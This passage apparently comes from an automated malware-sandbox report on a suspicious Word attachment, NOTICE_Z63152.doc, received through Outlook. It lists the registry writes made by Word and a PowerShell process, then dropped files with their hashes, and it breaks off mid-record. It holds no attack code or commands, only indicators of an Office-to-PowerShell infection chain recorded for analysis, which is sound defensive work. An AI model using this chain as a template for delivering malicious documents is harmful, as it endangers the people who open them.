HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Simplified Arabic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Simplified Arabic Fixed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

SimSun

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

SimSun-ExtB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Small Fonts

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Snap ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Stencil

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Sylfaen

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Symbol

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

System

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tahoma

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tempus Sans ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Terminal

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Times New Roman

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Traditional Arabic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Trebuchet MS

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tunga

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tw Cen MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tw Cen MT Condensed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tw Cen MT Condensed Extra Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Utsaah

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vani

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Verdana

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vijaya

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Viner Hand ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vivaldi

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vladimir Script

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vrinda

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Webdings

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Wide Latin

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Wingdings

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Wingdings 2

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Wingdings 3

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Yet R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

6?c

363F6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

%?c

253F6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

5?c

353F6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

e?c

653F6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

t?c

743F6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

d?c

643F6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

s?c

733F6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

# c

23206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

3 c

33206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

" c

22206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

2 c

32206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

b c

62206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

q c

71206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

a c

61206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

p c

70206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

0 c

30206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

? c

3F206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

/ c

2F206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

n c

6E206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

~ c

7E206300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

vkc

766B6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

ekc

656B6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

ukc

756B6300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10091400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1049

1332215819

236

powershell.exe

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

LanguageList

en-US

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

4294901760

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

4294901760

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

1048576

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

%windir%\tracing

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

4294901760

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

4294901760

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

1048576

236

powershell.exe

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

%windir%\tracing

236

powershell.exe

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

@%SystemRoot%\system32\p2pcollab.dll,-8042

Peer to Peer Trust

236

powershell.exe

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

@%SystemRoot%\system32\qagentrt.dll,-10

System Health Authentication

236

powershell.exe

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

@%SystemRoot%\system32\dnsapi.dll,-103

Domain Name System (DNS) Server Trust

236

powershell.exe

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

@%SystemRoot%\System32\fveui.dll,-843

BitLocker Drive Encryption

236

powershell.exe

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

@%SystemRoot%\System32\fveui.dll,-844

BitLocker Data Recovery Agent

Files activity

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID

Process

Filename

Type

236

powershell.exe

C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39ed77.TMP

binary

MD5: 35375f3d71ae42aa9777154d256b33bf

SHA256: bcff55e0934722e7952ea75d73ae7ce376e4adbc73de5e71d629975e9eac87ef

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\FD528577.wmf

wmf

MD5: b3898e9b0b6409e22a32249460f5cf01

SHA256: 8cd1ccb5f72e1d0be300e6bd5918409d67ce3877fc259ddc26f26dca8c5d1b54

236

powershell.exe

C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

binary

MD5: 35375f3d71ae42aa9777154d256b33bf

SHA256: bcff55e0934722e7952ea75d73ae7ce376e4adbc73de5e71d629975e9eac87ef

236

powershell.exe

C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DQGBT0Y0RF7NLJN88JO2.temp

––

MD5: ––

SHA256: ––

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\~DFFCD6A53EAEC5C7FC.TMP

––

MD5: ––

SHA256: ––

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67B0536A.wmf

wmf

MD5: a57a2154a729a43519e9c287eb776d1b

SHA256: 18d213bfcb84ef381345316a185e10f92e8cbd94901349e818856156c346d0ae

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96AA8F08.wmf

wmf

MD5: 9d222f3b1c86414afadff151054cc7b2

SHA256: fa53a70b3ecfc5535cb5a3f34830596867c52d0da0ca0a85746e40b8c7bb702b

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\913C47CD.wmf

wmf

MD5: 5339a883aace2e6faae3f064a0429d1f

SHA256: 4f3f91f5e8e7a5ecb43d2255202eab097b491f3bc8b222bef13159f9bbfa36a1

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA8A7863.wmf

wmf

MD5: cb292358e932b97996fa13f6c78a710f

SHA256: 445ff6cda46412bcd2bd573a62eb6ba8e0ba1e1324017e01e550f61506ba49c3

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6915FFC.wmf

wmf

MD5: 3431836249d6b35f34ace02c9b7301a8

SHA256: 76f424ca00db0130e0b2a9b251aa2b2f99bdc9a10561275197e5f4ef2ad20ab0

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\25F9E13E.wmf

wmf

MD5: 84097433e8e2df42ecfad1dc81766a3b

SHA256: 5eeb7f137e18a4f34071f928d156ca17dd3c0440d46d5fff99659ca191f09ef8

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C7D2427.wmf

wmf

MD5: c091693da1641dc449414f2b72299b99

SHA256: a19b266db155b8d16c89dfaf1bf7646bcf63703e38d64221a92f5d2e0ea503d1

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39F99AB.wmf

wmf

MD5: ac532fe8f68ceb12d9403c6b5aeb00e2

SHA256: 2d005757d9c15de00441da8fc8898e8148a1325f06b73eb213fbb3c4bf86aacf

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C807EFB0.wmf

wmf

MD5: a6b158f8cdf085a32a8be36ac30a805b

SHA256: 1fc0ad4a110bd5845b7400fcd7e2aaeeb63527f5b742cccafa659629d78bb362

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA174BF1.wmf

wmf

MD5: 9693c579996ca7ea5ae82ac175771ad6

SHA256: d23437e8d4a99b7cc9b97749c0340de0d84b25de8db89b176166bdb25306751c

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C763AFD2.wmf

wmf

MD5: 0afb578f32504ecc4f81f39742203170

SHA256: 3b035ee379ecd831db9b08f849da30f96f45ff12898cdc31fdac0fc3aa867ecf

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E90623D5.wmf

wmf

MD5: cb45e7bd07ead129c8712dd287ae4bd7

SHA256: b714afda749e6ccaab66ad926d81ce37ca7ca8fc19ba2be1ba2fc1da75baf2d9

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7565DCEF.wmf

wmf

MD5: b3898e9b0b6409e22a32249460f5cf01

SHA256: 8cd1ccb5f72e1d0be300e6bd5918409d67ce3877fc259ddc26f26dca8c5d1b54

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F8A7224.wmf

wmf

MD5: ffe5c6182c8645e07c46e5d9adfae9df

SHA256: 100439191680c35bc7890a469d8bd8aa7f1d8bdc7d64bfda68f8a6e1d522e502

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF94D326.wmf

wmf

MD5: 36e2f7f03813924d38a9d77e7006f91d

SHA256: 2ceb25f7e1df1cf937646c43bf32b93bf96a875d8ce187c120d36c9e8108b411

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C7B3379.wmf

wmf

MD5: 2f6b5a758d04d08942addfc9de95f11d

SHA256: 3c1aae1b65619d7a6a85a1af630aaf7ecca63beec93040f2211e45b788537a2f

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd

tlb

MD5: 6a729959ae7d7b4919720d23d142dd5e

SHA256: 5497e7d54845b7f03f96ac9a565bdd52db628a7cfc80f7a0f054d1e8b871b065

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\C692459D.wmf

wmf

MD5: ac532fe8f68ceb12d9403c6b5aeb00e2

SHA256: 2d005757d9c15de00441da8fc8898e8148a1325f06b73eb213fbb3c4bf86aacf

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\FD05C6B3.wmf

wmf

MD5: c091693da1641dc449414f2b72299b99

SHA256: a19b266db155b8d16c89dfaf1bf7646bcf63703e38d64221a92f5d2e0ea503d1

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\297F16FA.wmf

wmf

MD5: 9693c579996ca7ea5ae82ac175771ad6

SHA256: d23437e8d4a99b7cc9b97749c0340de0d84b25de8db89b176166bdb25306751c

2644

WINWORD.EXE

C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1049.acl

binary

MD5: 7ae4d40c175cb8897046c6def9d46451

SHA256: 4c92abe5b76e943467cc484da4f47921f947ce03a0b73bccd4119c1efa15051f

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\A879E639.wmf

wmf

MD5: cb292358e932b97996fa13f6c78a710f

SHA256: 445ff6cda46412bcd2bd573a62eb6ba8e0ba1e1324017e01e550f61506ba49c3

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\8DF16918.wmf

wmf

MD5: 5339a883aace2e6faae3f064a0429d1f

SHA256: 4f3f91f5e8e7a5ecb43d2255202eab097b491f3bc8b222bef13159f9bbfa36a1

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\C6FD310C.wmf

wmf

MD5: cb45e7bd07ead129c8712dd287ae4bd7

SHA256: b714afda749e6ccaab66ad926d81ce37ca7ca8fc19ba2be1ba2fc1da75baf2d9

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\29A143CE.wmf

wmf

MD5: 2f6b5a758d04d08942addfc9de95f11d

SHA256: 3c1aae1b65619d7a6a85a1af630aaf7ecca63beec93040f2211e45b788537a2f

1016

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\msoD4DE.tmp

compressed

MD5: 9578a63b228de7c2a3632535046af2af

SHA256: 2029e6021a8d05d58b5710b11fbdbd46a8267e4338380cfd8e81e7f4870ff94b

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\9D7FDB58.doc

document

MD5: 7c476d975b8d9bbbb44a12886173d5db

SHA256: dcfcc9b9cc8c6e1e90eecd0b22e3c8823921033a382f3b618931474b1c31c0d1

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\OICE_A6A73BF8-768A-4F2A-8D99-0EFA8392E64D.0\9D7FDB58.doc\:Zone.Identifier:$DATA

––

MD5: ––

SHA256: ––

2644

WINWORD.EXE

C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

pgc

MD5: a85e46725db89651c6db4d1f33795726

SHA256: 8abb383a148d970fbaad9c2362fd3a27b5b0665f689542b0041540feea88275d

2644

WINWORD.EXE

C:\Users\admin\AppData\Local\Temp\CVRC713.tmp.cvr

––

MD5: ––

SHA256: ––

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\22FMGLEE\NOTICE_Z63152 (2).doc

document

MD5: 7c476d975b8d9bbbb44a12886173d5db

SHA256: dcfcc9b9cc8c6e1e90eecd0b22e3c8823921033a382f3b618931474b1c31c0d1

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\22FMGLEE\NOTICE_Z63152.doc:Zone.Identifier

text

MD5: fbccf14d504b7b2dbcb5a5bda75bd93b

SHA256: eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\22FMGLEE\NOTICE_Z63152 (2).doc\:Zone.Identifier:$DATA

––

MD5: ––

SHA256: ––

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\22FMGLEE\NOTICE_Z63152.doc

document

MD5: 7c476d975b8d9bbbb44a12886173d5db

SHA256: dcfcc9b9cc8c6e1e90eecd0b22e3c8823921033a382f3b618931474b1c31c0d1

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_TCPrefs_2_04BAEC931EB4424C93F2906233933532.dat

xml

MD5: f194b1fa12f9b6f46a47391fae8beec2

SHA256: fcd8d7e030be6ea7588e5c6cb568e3f1bdfc263942074b693942a27df9521a74

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_ConversationPrefs_2_F3B30A7E1B549D45B7A93F89E341E320.dat

xml

MD5: 57f30b1bca811c2fcb81f4c13f6a927b

SHA256: 612bad93621991cb09c347ff01ec600b46617247d5c041311ff459e247d8c2d3

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_ContactPrefs_2_48D2759808563A44AAFE636682B8D65C.dat

xml

MD5: bbcf400bd7ae536eb03054021d6a6398

SHA256: 383020065c1f31f4fb09f448599a6d5e532c390af4e5b8af0771fe17a23222ad

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_RssRule_2_DF4138405E3AA34B96C303CE20B3547E.dat

xml

MD5: d8b37ed0410fb241c283f72b76987f18

SHA256: 31e68049f6b7f21511e70cd7f2d95b9cf1354cf54603e8f47c1fc40f40b7a114

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_WorkHours_1_FFE18E6B2B43CB4E88C022C5AA06761C.dat

xml

MD5: 807ef0fc900feb3da82927990083d6e7

SHA256: 4411e7dc978011222764943081500fff0e43cbf7ccd44264bd1ab6306ca68913

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_327CDEF1D04DC14CAE2C2A52690EA62B.dat

xml

MD5: eeaa832c12f20de6aaaa9c7b77626e72

